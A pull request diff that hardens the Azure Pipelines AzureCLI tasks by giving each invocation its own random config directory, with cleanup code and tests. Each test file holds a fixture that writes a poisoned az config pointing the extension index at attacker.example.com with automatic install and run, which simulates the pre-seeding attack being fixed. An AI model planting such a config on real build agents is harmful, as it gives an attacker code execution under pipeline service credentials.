### PR TITLE
AzureCLI V1/V2/V3: isolate AZURE_CONFIG_DIR per task invocation

### DIFF
--- a/Tasks/AzureCLIV1/Tests/L0.ts
+++ b/Tasks/AzureCLIV1/Tests/L0.ts
@@ -3,9 +3,14 @@ import path = require('path');
 import os = require('os');
 
 import * as ttm from 'azure-pipelines-task-lib/mock-test';
+import { runConfigDirIsolationTests } from './L0ConfigDirIsolation';
 
 describe('AzureCLIV1 Suite', function () {
     this.timeout(20000);
+
+    describe('AZURE_CONFIG_DIR isolation', () => {
+        runConfigDirIsolationTests();
+    });
 
     // Use cross-platform temp directory for assertions
     const tempDir = require('os').tmpdir();

--- a/Tasks/AzureCLIV1/Tests/L0ConfigDirIsolation.ts
+++ b/Tasks/AzureCLIV1/Tests/L0ConfigDirIsolation.ts
@@ -1,0 +1,121 @@
+import assert = require('assert');
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from '../src/AzureCliConfigDir';
+
+export function runConfigDirIsolationTests() {
+    describe('createPerInvocationAzureConfigDir (security hardening)', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+        });
+
+        it('creates a brand-new directory under the agent temp root', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert(fs.existsSync(dir), 'config dir should exist on disk');
+                assert(fs.statSync(dir).isDirectory(), 'should be a directory');
+                assert(path.dirname(dir) === fs.realpathSync(agentTemp) || path.dirname(dir) === agentTemp,
+                    `config dir parent should be agent temp, got ${path.dirname(dir)}`);
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('does NOT use the predictable ".azclitask" path that the vulnerable code used', () => {
+            const vulnerablePath = path.join(agentTemp, '.azclitask');
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, vulnerablePath,
+                    'must not use the fixed predictable path attackable by pre-seeding');
+                assert(path.basename(dir).startsWith('.azclitask-'),
+                    `basename should start with ".azclitask-" (got "${path.basename(dir)}")`);
+                assert(path.basename(dir).length > '.azclitask-'.length,
+                    'mkdtemp must append a random suffix');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('produces a different directory on each invocation', () => {
+            const a = createPerInvocationAzureConfigDir(agentTemp);
+            const b = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(a, b, 'two invocations must yield distinct dirs');
+            } finally {
+                fs.rmSync(a, { recursive: true, force: true });
+                fs.rmSync(b, { recursive: true, force: true });
+            }
+        });
+
+        it('ignores an attacker-pre-seeded ".azclitask/config" in the agent temp', () => {
+            // Simulate the exact attack: a prior step writes a poisoned config at the
+            // predictable path the vulnerable task used to point AZURE_CONFIG_DIR at.
+            const poisonedDir = path.join(agentTemp, '.azclitask');
+            fs.mkdirSync(poisonedDir, { recursive: true });
+            const poisonedConfig = path.join(poisonedDir, 'config');
+            fs.writeFileSync(poisonedConfig,
+                '[extension]\nindex_url = https://attacker.example.com/index.json\n' +
+                'use_dynamic_install = yes_without_prompt\n' +
+                'run_after_dynamic_install = True\n');
+
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, poisonedDir,
+                    'new config dir must not be the attacker-controlled predictable path');
+                assert(!fs.existsSync(path.join(dir, 'config')),
+                    'newly-created config dir must not contain a pre-seeded config file');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('throws when agentTempDir is empty/undefined', () => {
+            assert.throws(() => createPerInvocationAzureConfigDir(undefined as any));
+            assert.throws(() => createPerInvocationAzureConfigDir(''));
+        });
+    });
+
+    describe('removePerInvocationAzureConfigDir', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+            delete process.env['AZURE_CONFIG_DIR'];
+        });
+
+        it('removes the directory (even when it contains files left by az)', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            fs.writeFileSync(path.join(dir, 'config'), '[extension]\nindex_url = x\n');
+            fs.mkdirSync(path.join(dir, 'cliextensions'));
+            process.env['AZURE_CONFIG_DIR'] = dir;
+            removePerInvocationAzureConfigDir(dir);
+            assert(!fs.existsSync(dir), 'directory must be gone after cleanup');
+            assert(process.env['AZURE_CONFIG_DIR'] === undefined,
+                'AZURE_CONFIG_DIR env var must be unset after cleanup');
+        });
+
+        it('is a no-op for null/empty inputs (safe in finally)', () => {
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(null));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(undefined));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(''));
+        });
+
+        it('never throws when the path does not exist', () => {
+            const ghost = path.join(agentTemp, '.azclitask-ghost00');
+            assert(!fs.existsSync(ghost));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(ghost));
+        });
+    });
+}

--- a/Tasks/AzureCLIV1/azureclitask.ts
+++ b/Tasks/AzureCLIV1/azureclitask.ts
@@ -5,6 +5,7 @@ import fs = require("fs");
 import os = require("os");
 import { getHandlerFromToken, WebApi } from "azure-devops-node-api";
 import { ITaskApi } from "azure-devops-node-api/TaskApi";
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from "./src/AzureCliConfigDir";
 
 const nodeVersion = parseInt(process.version.split('.')[0].replace('v', ''));
 if (nodeVersion > 16) {
@@ -117,6 +118,11 @@ export class azureclitask {
                 tl.rmRF(this.cliPasswordPath);
             }
 
+            if (this.azCliConfigPath) {
+                removePerInvocationAzureConfigDir(this.azCliConfigPath);
+                this.azCliConfigPath = null;
+            }
+
             //set the task result to either succeeded or failed based on error was thrown or not
             if (toolExecutionError) {
                 let message = tl.loc('ScriptFailed', toolExecutionError);
@@ -160,6 +166,7 @@ export class azureclitask {
 
     private static isLoggedIn: boolean = false;
     private static cliPasswordPath: string = null;
+    private static azCliConfigPath: string = null;
     private static servicePrincipalId: string = null;
     private static servicePrincipalKey: string = null;
     private static federatedToken: string = null;
@@ -229,10 +236,14 @@ export class azureclitask {
             return;
         }
 
-        if (!!tl.getVariable('Agent.TempDirectory')) {
-            var azCliConfigPath = path.join(tl.getVariable('Agent.TempDirectory'), ".azclitask");
-            console.log(tl.loc('SettingAzureConfigDir', azCliConfigPath));
-            process.env['AZURE_CONFIG_DIR'] = azCliConfigPath;
+        const agentTempDir = tl.getVariable('Agent.TempDirectory');
+        if (!!agentTempDir) {
+            // Security: create an unpredictable per-invocation
+            // directory so an earlier pipeline step cannot pre-seed a poisoned
+            // az config file at $(Agent.TempDirectory)/.azclitask/config.
+            this.azCliConfigPath = createPerInvocationAzureConfigDir(agentTempDir);
+            console.log(tl.loc('SettingAzureConfigDir', this.azCliConfigPath));
+            process.env['AZURE_CONFIG_DIR'] = this.azCliConfigPath;
         } else {
             console.warn(tl.loc('GlobalCliConfigAgentVersionWarning'));
         }

--- a/Tasks/AzureCLIV1/src/AzureCliConfigDir.ts
+++ b/Tasks/AzureCLIV1/src/AzureCliConfigDir.ts
@@ -1,0 +1,59 @@
+import * as fs from 'fs';
+import * as path from 'path';
+import * as tl from 'azure-pipelines-task-lib/task';
+
+/**
+ * AZURE_CONFIG_DIR isolation helper for the AzureCLI@1/@2/@3 tasks.
+ *
+ * NOTE: this file is intentionally duplicated under
+ * Tasks/AzureCLIV1/src, Tasks/AzureCLIV2/src and Tasks/AzureCLIV3/src.
+ * Each AzureCLI task is shipped as a self-contained npm package and the
+ * repo convention is to keep small, task-coupled helpers in the task
+ * folder rather than introduce a new shared package. Keep all three
+ * copies in sync when changing this file.
+ *
+ * Background: the legacy code pointed AZURE_CONFIG_DIR at the predictable
+ * path $(Agent.TempDirectory)/.azclitask which allowed any earlier
+ * pipeline step running on the same agent to pre-seed a poisoned `config`
+ * file (e.g. extension.index_url / use_dynamic_install /
+ * run_after_dynamic_install) and achieve code execution under the
+ * service-connection identity once the AzureCLI task subsequently invoked
+ * `az`. Creating a fresh, unpredictable directory per invocation closes
+ * that gap.
+ */
+
+/**
+ * Creates a per-invocation, unpredictable AZURE_CONFIG_DIR under the
+ * supplied agent temp directory. Returns the absolute path. The directory
+ * has the form `${agentTempDir}/.azclitask-XXXXXX` where XXXXXX is six
+ * cryptographically-random alphanumeric characters chosen by libuv
+ * (filesystem-safe on every supported OS).
+ */
+export function createPerInvocationAzureConfigDir(agentTempDir: string): string {
+    if (!agentTempDir) {
+        throw new Error('agentTempDir is required');
+    }
+    return fs.mkdtempSync(path.join(agentTempDir, '.azclitask-'));
+}
+
+/**
+ * Removes a directory previously created by
+ * createPerInvocationAzureConfigDir and unsets the AZURE_CONFIG_DIR env
+ * var. Safe to call in `finally` — never throws; logs to tl.debug on
+ * failure so a broken cleanup cannot mask the original task error.
+ */
+export function removePerInvocationAzureConfigDir(configPath: string | null | undefined): void {
+    if (!configPath) {
+        return;
+    }
+    tl.debug(`Removing per-invocation AZURE_CONFIG_DIR: ${configPath}`);
+    try {
+        tl.rmRF(configPath);
+    } catch (rmErr) {
+        const msg = (rmErr && (rmErr as Error).message) || String(rmErr);
+        tl.debug(`Failed to remove AZURE_CONFIG_DIR: ${msg}`);
+    }
+    try {
+        delete process.env['AZURE_CONFIG_DIR'];
+    } catch { /* ignore */ }
+}

--- a/Tasks/AzureCLIV2/Tests/L0.ts
+++ b/Tasks/AzureCLIV2/Tests/L0.ts
@@ -4,6 +4,7 @@ import path = require('path');
 import * as ttm from 'azure-pipelines-task-lib/mock-test';
 import { runValidateScriptArgsTests } from './L0ValidateScriptArgs';
 import { runTryValidateScriptArgsTests } from './L0TryValidateScriptArgs';
+import { runConfigDirIsolationTests } from './L0ConfigDirIsolation';
 
 describe('AzureCLIV2 Suite', function () {
     this.timeout(30000);
@@ -14,6 +15,10 @@ describe('AzureCLIV2 Suite', function () {
 
     describe('Args validation feature flag (EnableAzureCliArgsValidation)', () => {
         runTryValidateScriptArgsTests();
+    });
+
+    describe('AZURE_CONFIG_DIR isolation', () => {
+        runConfigDirIsolationTests();
     });
 
     it('LateBoundIdToken: Feature Flag ON, Token Present -> Uses Token, Emits Telemetry', async () => {

--- a/Tasks/AzureCLIV2/Tests/L0ConfigDirIsolation.ts
+++ b/Tasks/AzureCLIV2/Tests/L0ConfigDirIsolation.ts
@@ -1,0 +1,121 @@
+import assert = require('assert');
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from '../src/AzureCliConfigDir';
+
+export function runConfigDirIsolationTests() {
+    describe('createPerInvocationAzureConfigDir (security hardening)', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+        });
+
+        it('creates a brand-new directory under the agent temp root', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert(fs.existsSync(dir), 'config dir should exist on disk');
+                assert(fs.statSync(dir).isDirectory(), 'should be a directory');
+                assert(path.dirname(dir) === fs.realpathSync(agentTemp) || path.dirname(dir) === agentTemp,
+                    `config dir parent should be agent temp, got ${path.dirname(dir)}`);
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('does NOT use the predictable ".azclitask" path that the vulnerable code used', () => {
+            const vulnerablePath = path.join(agentTemp, '.azclitask');
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, vulnerablePath,
+                    'must not use the fixed predictable path attackable by pre-seeding');
+                assert(path.basename(dir).startsWith('.azclitask-'),
+                    `basename should start with ".azclitask-" (got "${path.basename(dir)}")`);
+                assert(path.basename(dir).length > '.azclitask-'.length,
+                    'mkdtemp must append a random suffix');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('produces a different directory on each invocation', () => {
+            const a = createPerInvocationAzureConfigDir(agentTemp);
+            const b = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(a, b, 'two invocations must yield distinct dirs');
+            } finally {
+                fs.rmSync(a, { recursive: true, force: true });
+                fs.rmSync(b, { recursive: true, force: true });
+            }
+        });
+
+        it('ignores an attacker-pre-seeded ".azclitask/config" in the agent temp', () => {
+            // Simulate the exact attack: a prior step writes a poisoned config at the
+            // predictable path the vulnerable task used to point AZURE_CONFIG_DIR at.
+            const poisonedDir = path.join(agentTemp, '.azclitask');
+            fs.mkdirSync(poisonedDir, { recursive: true });
+            const poisonedConfig = path.join(poisonedDir, 'config');
+            fs.writeFileSync(poisonedConfig,
+                '[extension]\nindex_url = https://attacker.example.com/index.json\n' +
+                'use_dynamic_install = yes_without_prompt\n' +
+                'run_after_dynamic_install = True\n');
+
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, poisonedDir,
+                    'new config dir must not be the attacker-controlled predictable path');
+                assert(!fs.existsSync(path.join(dir, 'config')),
+                    'newly-created config dir must not contain a pre-seeded config file');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('throws when agentTempDir is empty/undefined', () => {
+            assert.throws(() => createPerInvocationAzureConfigDir(undefined as any));
+            assert.throws(() => createPerInvocationAzureConfigDir(''));
+        });
+    });
+
+    describe('removePerInvocationAzureConfigDir', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+            delete process.env['AZURE_CONFIG_DIR'];
+        });
+
+        it('removes the directory (even when it contains files left by az)', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            fs.writeFileSync(path.join(dir, 'config'), '[extension]\nindex_url = x\n');
+            fs.mkdirSync(path.join(dir, 'cliextensions'));
+            process.env['AZURE_CONFIG_DIR'] = dir;
+            removePerInvocationAzureConfigDir(dir);
+            assert(!fs.existsSync(dir), 'directory must be gone after cleanup');
+            assert(process.env['AZURE_CONFIG_DIR'] === undefined,
+                'AZURE_CONFIG_DIR env var must be unset after cleanup');
+        });
+
+        it('is a no-op for null/empty inputs (safe in finally)', () => {
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(null));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(undefined));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(''));
+        });
+
+        it('never throws when the path does not exist', () => {
+            const ghost = path.join(agentTemp, '.azclitask-ghost00');
+            assert(!fs.existsSync(ghost));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(ghost));
+        });
+    });
+}

--- a/Tasks/AzureCLIV2/azureclitask.ts
+++ b/Tasks/AzureCLIV2/azureclitask.ts
@@ -10,6 +10,7 @@ import { getHandlerFromToken, WebApi } from "azure-devops-node-api";
 import { ITaskApi } from "azure-devops-node-api/TaskApi";
 import { validateAzModuleVersion } from "azure-pipelines-tasks-azure-arm-rest/azCliUtility";
 import { tryValidateScriptArgs, ArgsSanitizingError } from "./src/argsSanitizer";
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from "./src/AzureCliConfigDir";
 
 const nodeVersion = parseInt(process.version.split('.')[0].replace('v', ''));
 if (nodeVersion > 16) {
@@ -147,12 +148,21 @@ export class azureclitask {
             }
 
             if (scriptType) {
-                await scriptType.cleanUp();
+                try {
+                    await scriptType.cleanUp();
+                } catch (cleanupErr) {
+                    tl.debug(`scriptType.cleanUp() threw: ${cleanupErr && cleanupErr.message || cleanupErr}`);
+                }
             }
 
             if (this.cliPasswordPath) {
                 tl.debug('Removing spn certificate file');
                 tl.rmRF(this.cliPasswordPath);
+            }
+
+            if (this.azCliConfigPath) {
+                removePerInvocationAzureConfigDir(this.azCliConfigPath);
+                this.azCliConfigPath = null;
             }
 
             //set the task result to either succeeded or failed based on error was thrown or not
@@ -223,6 +233,7 @@ export class azureclitask {
 
     private static isLoggedIn: boolean = false;
     private static cliPasswordPath: string = null;
+    private static azCliConfigPath: string = null;
     private static servicePrincipalId: string = null;
     private static servicePrincipalKey: string = null;
     private static federatedToken: string = null;
@@ -354,13 +365,20 @@ export class azureclitask {
             return;
         }
 
-        if (!!tl.getVariable('Agent.TempDirectory')) {
-            var azCliConfigPath = path.join(tl.getVariable('Agent.TempDirectory'), ".azclitask");
-            console.log(tl.loc('SettingAzureConfigDir', azCliConfigPath));
-            process.env['AZURE_CONFIG_DIR'] = azCliConfigPath;
-        } else {
+        const tempDir = tl.getVariable('Agent.TempDirectory');
+        if (!tempDir) {
             console.warn(tl.loc('GlobalCliConfigAgentVersionWarning'));
+            return;
         }
+
+        // Security: use a freshly-created, unpredictable per-invocation directory
+        // so that an earlier step cannot pre-seed $(Agent.TempDirectory)/.azclitask/config
+        // with a poisoned extension.index_url (security hardening).
+        // fs.mkdtempSync creates a brand-new directory; the random suffix prevents
+        // attacker pre-seeding and the tight perms come from the agent temp root.
+        this.azCliConfigPath = createPerInvocationAzureConfigDir(tempDir);
+        console.log(tl.loc('SettingAzureConfigDir', this.azCliConfigPath));
+        process.env['AZURE_CONFIG_DIR'] = this.azCliConfigPath;
     }
 
     private static setAzureCloudBasedOnServiceEndpoint(): void {

--- a/Tasks/AzureCLIV2/src/AzureCliConfigDir.ts
+++ b/Tasks/AzureCLIV2/src/AzureCliConfigDir.ts
@@ -1,0 +1,59 @@
+import * as fs from 'fs';
+import * as path from 'path';
+import * as tl from 'azure-pipelines-task-lib/task';
+
+/**
+ * AZURE_CONFIG_DIR isolation helper for the AzureCLI@1/@2/@3 tasks.
+ *
+ * NOTE: this file is intentionally duplicated under
+ * Tasks/AzureCLIV1/src, Tasks/AzureCLIV2/src and Tasks/AzureCLIV3/src.
+ * Each AzureCLI task is shipped as a self-contained npm package and the
+ * repo convention is to keep small, task-coupled helpers in the task
+ * folder rather than introduce a new shared package. Keep all three
+ * copies in sync when changing this file.
+ *
+ * Background: the legacy code pointed AZURE_CONFIG_DIR at the predictable
+ * path $(Agent.TempDirectory)/.azclitask which allowed any earlier
+ * pipeline step running on the same agent to pre-seed a poisoned `config`
+ * file (e.g. extension.index_url / use_dynamic_install /
+ * run_after_dynamic_install) and achieve code execution under the
+ * service-connection identity once the AzureCLI task subsequently invoked
+ * `az`. Creating a fresh, unpredictable directory per invocation closes
+ * that gap.
+ */
+
+/**
+ * Creates a per-invocation, unpredictable AZURE_CONFIG_DIR under the
+ * supplied agent temp directory. Returns the absolute path. The directory
+ * has the form `${agentTempDir}/.azclitask-XXXXXX` where XXXXXX is six
+ * cryptographically-random alphanumeric characters chosen by libuv
+ * (filesystem-safe on every supported OS).
+ */
+export function createPerInvocationAzureConfigDir(agentTempDir: string): string {
+    if (!agentTempDir) {
+        throw new Error('agentTempDir is required');
+    }
+    return fs.mkdtempSync(path.join(agentTempDir, '.azclitask-'));
+}
+
+/**
+ * Removes a directory previously created by
+ * createPerInvocationAzureConfigDir and unsets the AZURE_CONFIG_DIR env
+ * var. Safe to call in `finally` — never throws; logs to tl.debug on
+ * failure so a broken cleanup cannot mask the original task error.
+ */
+export function removePerInvocationAzureConfigDir(configPath: string | null | undefined): void {
+    if (!configPath) {
+        return;
+    }
+    tl.debug(`Removing per-invocation AZURE_CONFIG_DIR: ${configPath}`);
+    try {
+        tl.rmRF(configPath);
+    } catch (rmErr) {
+        const msg = (rmErr && (rmErr as Error).message) || String(rmErr);
+        tl.debug(`Failed to remove AZURE_CONFIG_DIR: ${msg}`);
+    }
+    try {
+        delete process.env['AZURE_CONFIG_DIR'];
+    } catch { /* ignore */ }
+}

--- a/Tasks/AzureCLIV3/Tests/L0.ts
+++ b/Tasks/AzureCLIV3/Tests/L0.ts
@@ -3,6 +3,7 @@ import path = require('path');
 import * as ttm from 'azure-pipelines-task-lib/mock-test';
 import { runValidateScriptArgsTests } from './L0ValidateScriptArgs';
 import { runTryValidateScriptArgsTests } from './L0TryValidateScriptArgs';
+import { runConfigDirIsolationTests } from './L0ConfigDirIsolation';
 
 describe('AzureCLIV3 Suite', function () {
     const timeout = 30000;
@@ -19,6 +20,10 @@ describe('AzureCLIV3 Suite', function () {
 
     describe('Args validation feature flag (EnableAzureCliArgsValidation)', () => {
         runTryValidateScriptArgsTests();
+    });
+
+    describe('AZURE_CONFIG_DIR isolation', () => {
+        runConfigDirIsolationTests();
     });
 
     it('Should handle Azure DevOps connection with Workload Identity Federation', function (done) {

--- a/Tasks/AzureCLIV3/Tests/L0ConfigDirIsolation.ts
+++ b/Tasks/AzureCLIV3/Tests/L0ConfigDirIsolation.ts
@@ -1,0 +1,121 @@
+import assert = require('assert');
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from '../src/AzureCliConfigDir';
+
+export function runConfigDirIsolationTests() {
+    describe('createPerInvocationAzureConfigDir (security hardening)', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+        });
+
+        it('creates a brand-new directory under the agent temp root', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert(fs.existsSync(dir), 'config dir should exist on disk');
+                assert(fs.statSync(dir).isDirectory(), 'should be a directory');
+                assert(path.dirname(dir) === fs.realpathSync(agentTemp) || path.dirname(dir) === agentTemp,
+                    `config dir parent should be agent temp, got ${path.dirname(dir)}`);
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('does NOT use the predictable ".azclitask" path that the vulnerable code used', () => {
+            const vulnerablePath = path.join(agentTemp, '.azclitask');
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, vulnerablePath,
+                    'must not use the fixed predictable path attackable by pre-seeding');
+                assert(path.basename(dir).startsWith('.azclitask-'),
+                    `basename should start with ".azclitask-" (got "${path.basename(dir)}")`);
+                assert(path.basename(dir).length > '.azclitask-'.length,
+                    'mkdtemp must append a random suffix');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('produces a different directory on each invocation', () => {
+            const a = createPerInvocationAzureConfigDir(agentTemp);
+            const b = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(a, b, 'two invocations must yield distinct dirs');
+            } finally {
+                fs.rmSync(a, { recursive: true, force: true });
+                fs.rmSync(b, { recursive: true, force: true });
+            }
+        });
+
+        it('ignores an attacker-pre-seeded ".azclitask/config" in the agent temp', () => {
+            // Simulate the exact attack: a prior step writes a poisoned config at the
+            // predictable path the vulnerable task used to point AZURE_CONFIG_DIR at.
+            const poisonedDir = path.join(agentTemp, '.azclitask');
+            fs.mkdirSync(poisonedDir, { recursive: true });
+            const poisonedConfig = path.join(poisonedDir, 'config');
+            fs.writeFileSync(poisonedConfig,
+                '[extension]\nindex_url = https://attacker.example.com/index.json\n' +
+                'use_dynamic_install = yes_without_prompt\n' +
+                'run_after_dynamic_install = True\n');
+
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, poisonedDir,
+                    'new config dir must not be the attacker-controlled predictable path');
+                assert(!fs.existsSync(path.join(dir, 'config')),
+                    'newly-created config dir must not contain a pre-seeded config file');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('throws when agentTempDir is empty/undefined', () => {
+            assert.throws(() => createPerInvocationAzureConfigDir(undefined as any));
+            assert.throws(() => createPerInvocationAzureConfigDir(''));
+        });
+    });
+
+    describe('removePerInvocationAzureConfigDir', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+            delete process.env['AZURE_CONFIG_DIR'];
+        });
+
+        it('removes the directory (even when it contains files left by az)', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            fs.writeFileSync(path.join(dir, 'config'), '[extension]\nindex_url = x\n');
+            fs.mkdirSync(path.join(dir, 'cliextensions'));
+            process.env['AZURE_CONFIG_DIR'] = dir;
+            removePerInvocationAzureConfigDir(dir);
+            assert(!fs.existsSync(dir), 'directory must be gone after cleanup');
+            assert(process.env['AZURE_CONFIG_DIR'] === undefined,
+                'AZURE_CONFIG_DIR env var must be unset after cleanup');
+        });
+
+        it('is a no-op for null/empty inputs (safe in finally)', () => {
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(null));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(undefined));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(''));
+        });
+
+        it('never throws when the path does not exist', () => {
+            const ghost = path.join(agentTemp, '.azclitask-ghost00');
+            assert(!fs.existsSync(ghost));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(ghost));
+        });
+    });
+}

--- a/Tasks/AzureCLIV3/azureclitask.ts
+++ b/Tasks/AzureCLIV3/azureclitask.ts
@@ -10,6 +10,7 @@ import { ITaskApi } from "azure-devops-node-api/TaskApi";
 import { validateAzModuleVersion } from "azure-pipelines-tasks-azure-arm-rest/azCliUtility";
 import { emitTelemetry } from 'azure-pipelines-tasks-artifacts-common/telemetry';
 import { tryValidateScriptArgs, ArgsSanitizingError } from "./src/argsSanitizer";
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from "./src/AzureCliConfigDir";
 
 const nodeVersion = parseInt(process.version.split('.')[0].replace('v', ''));
 if (nodeVersion > 16) {
@@ -162,12 +163,21 @@ export class azureclitask {
             }
 
             if (scriptType) {
-                await scriptType.cleanUp();
+                try {
+                    await scriptType.cleanUp();
+                } catch (cleanupErr) {
+                    tl.debug(`scriptType.cleanUp() threw: ${cleanupErr && cleanupErr.message || cleanupErr}`);
+                }
             }
 
             if (this.cliPasswordPath) {
                 tl.debug('Removing spn certificate file');
                 tl.rmRF(this.cliPasswordPath);
+            }
+
+            if (this.azCliConfigPath) {
+                removePerInvocationAzureConfigDir(this.azCliConfigPath);
+                this.azCliConfigPath = null;
             }
 
             //set the task result to either succeeded or failed based on error was thrown or not
@@ -259,6 +269,7 @@ export class azureclitask {
 
     private static isLoggedIn: boolean = false;
     private static cliPasswordPath: string = null;
+    private static azCliConfigPath: string = null;
     private static servicePrincipalId: string = null;
     private static servicePrincipalKey: string = null;
     private static federatedToken: string = null;
@@ -502,10 +513,14 @@ export class azureclitask {
             return;
         }
 
-        if (!!tl.getVariable('Agent.TempDirectory')) {
-            var azCliConfigPath = path.join(tl.getVariable('Agent.TempDirectory'), ".azclitask");
-            console.log(tl.loc('SettingAzureConfigDir', azCliConfigPath));
-            process.env['AZURE_CONFIG_DIR'] = azCliConfigPath;
+        const agentTempDir = tl.getVariable('Agent.TempDirectory');
+        if (!!agentTempDir) {
+            // Security: create an unpredictable per-invocation
+            // directory so an earlier pipeline step cannot pre-seed a poisoned
+            // az config file at $(Agent.TempDirectory)/.azclitask/config.
+            this.azCliConfigPath = createPerInvocationAzureConfigDir(agentTempDir);
+            console.log(tl.loc('SettingAzureConfigDir', this.azCliConfigPath));
+            process.env['AZURE_CONFIG_DIR'] = this.azCliConfigPath;
         } else {
             console.warn(tl.loc('GlobalCliConfigAgentVersionWarning'));
         }

--- a/Tasks/AzureCLIV3/src/AzureCliConfigDir.ts
+++ b/Tasks/AzureCLIV3/src/AzureCliConfigDir.ts
@@ -1,0 +1,59 @@
+import * as fs from 'fs';
+import * as path from 'path';
+import * as tl from 'azure-pipelines-task-lib/task';
+
+/**
+ * AZURE_CONFIG_DIR isolation helper for the AzureCLI@1/@2/@3 tasks.
+ *
+ * NOTE: this file is intentionally duplicated under
+ * Tasks/AzureCLIV1/src, Tasks/AzureCLIV2/src and Tasks/AzureCLIV3/src.
+ * Each AzureCLI task is shipped as a self-contained npm package and the
+ * repo convention is to keep small, task-coupled helpers in the task
+ * folder rather than introduce a new shared package. Keep all three
+ * copies in sync when changing this file.
+ *
+ * Background: the legacy code pointed AZURE_CONFIG_DIR at the predictable
+ * path $(Agent.TempDirectory)/.azclitask which allowed any earlier
+ * pipeline step running on the same agent to pre-seed a poisoned `config`
+ * file (e.g. extension.index_url / use_dynamic_install /
+ * run_after_dynamic_install) and achieve code execution under the
+ * service-connection identity once the AzureCLI task subsequently invoked
+ * `az`. Creating a fresh, unpredictable directory per invocation closes
+ * that gap.
+ */
+
+/**
+ * Creates a per-invocation, unpredictable AZURE_CONFIG_DIR under the
+ * supplied agent temp directory. Returns the absolute path. The directory
+ * has the form `${agentTempDir}/.azclitask-XXXXXX` where XXXXXX is six
+ * cryptographically-random alphanumeric characters chosen by libuv
+ * (filesystem-safe on every supported OS).
+ */
+export function createPerInvocationAzureConfigDir(agentTempDir: string): string {
+    if (!agentTempDir) {
